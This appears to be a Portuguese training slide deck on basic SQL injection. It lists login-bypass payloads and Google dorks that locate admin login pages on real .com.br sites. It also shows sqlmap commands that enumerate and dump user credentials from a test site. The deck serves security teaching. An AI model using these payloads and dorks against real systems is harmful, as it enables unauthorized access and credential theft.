Escolar Documentos
Profissional Documentos
Cultura Documentos
Também é considerado SQL Injection o fato de enganar o form com uma falha de
programação.
Vamos supor que adicionamos aos campos de usuário e senha o seguinte item.
' or 1=1 --
SELECT * FROM usuarios WHERE login = ' ' or 1=1- - ' AND senha = '[senha]';
Sql Injection Básico - Exemplo
Formação: Analise em Segurança da Informação – SQL Injection Básico
DORK
inurl:"adm/index.asp" site:com.br
Sql Injection Básico - Dorks
Formação: Analise em Segurança da Informação – SQL Injection Básico
Outras Dorks:
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
Sql Injection Básico - Strings
Formação: Analise em Segurança da Informação – SQL Injection Básico
Variação de Strings:
admin'-- ' or a=a--
' or 0=0 -- " or "a"="a
" or 0=0 -- ') or ('a'='a
or 0=0 -- ") or ("a"="a
' or 0=0 # hi" or "a"="a
" or 0=0 # hi" or 1=1 --
or 0=0 # hi' or 1=1 --
' or 'x'='x hi' or 'a'='a
" or "x"="x hi') or ('a'='a
') or ('x'='x hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
SQL Injection x Blind SQL
Formação: Analise em Segurança da Informação – SQL Injection Básico
SQLMAP
“Sqlmap é uma ferramenta open source para penetration test que automatiza o
processo de detecção e exploiting de vulnerabilidades a Sqli Injection, é escrita
em python e tem suporte tanto GNU linux ou windows.”
--help
Mostra as opções do SQLMAP
--current-db
Apresenta o banco de dados atual
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db
--banner
Pega o Banner do DBMS
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -b
--dbs
Lista os bancos de dados do DBMS
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
--tables
Apresenta as tabelas do banco selecionado
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1"
-D acuart --tables
--columns
Apresenta as colunas da tabela selecionada
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1"
-D acuart -T users --columns
--dump
Extrai as informações da colunas selecionadas
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1"
-D acuart -T users -C 'uname,pass' --dump
SQLMap
Formação: Analise em Segurança da Informação – SQL Injection Básico
--current-user
Apresenta o usuário ao qual a página está usando para se conectar ao banco
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-user
--is-dba
Verifica se o usuário atual é administrador do Banco
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --is-dba
--users
Enumera todos os usuários
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --users
--search
Varre o banco atrás do que você procura, pode ser um banco, tabela ou coluna
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --search –C ‘pass’
printf ("\Chega por hoje\n");
Formação: Analise em Segurança da Informação – SQL Injection Básico
www.eSecurity.com.br
E-mail: alan.sanches@esecurity.com.br
Skype: desafiohacker
Fanpage: www.facebook.com/academiahacker